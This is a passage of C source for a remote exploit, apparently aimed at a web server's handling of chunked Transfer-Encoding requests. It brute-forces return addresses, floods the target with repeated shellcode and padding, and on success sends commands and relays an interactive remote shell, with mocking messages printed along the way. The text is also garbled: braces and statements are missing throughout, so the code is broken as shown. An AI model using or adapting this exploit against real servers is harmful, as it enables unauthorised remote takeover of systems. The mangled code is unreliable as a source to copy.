return -1;
printf("[*] Resolving target host.. ");
he = gethostbyname(hostp);
memcpy(&ia.s_addr, he->h_addr, 4);
else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
printf("There'z no %s on this side of the Net!\n", hostp);
return -1;
for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(atoi(portp));
printf("[*] Connecting.. ");
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
+ ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero
+ 1024) *
for (i = 0; i < REP_SHELLCODE; i++) {
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
for (i = 0; i < REP_POPULATOR; i++) {
for (j = 0; j < victim.repretaddr; j++) {
*p++ = victim.retaddr & 0xff;
*p++ = (victim.retaddr >> 8) & 0xff;
*p++ = (victim.retaddr >> 16) & 0xff;
*p++ = (victim.retaddr >> 24) & 0xff;
PUT_BYTES(victim.repzero, 0);
PUT_STRING("Transfer-Encoding: chunked\r\n");
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
if(!shown_length) {
printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
shown_length = 1;
write(sock, expbuf, p - expbuf);
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
for(i = 0; i < 40; i ++)
printf(" ");
putchar(((rand()>>8)%2)? 'P':
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = sc_timeout;
tv.tv_usec = 0;
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
if(n >= 1)
for(i = 0; i < n; i ++)
if(buf[i] == 'G')
responses ++;
responses = 0;
if(responses >= 2)
owned = 1;
write(sock, "O", 1);
write(sock, cmdz, strlen(cmdz));
printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n", victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero);
printf("Experts say this isn't exploitable, so nothing will happen now: ");
} else
write(1, buf, n);
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
write(sock, buf, n);
return 0;
if(!bruteforce) {
fprintf(stderr, "Ooops.. hehehe!\n");
return -1;
return 0;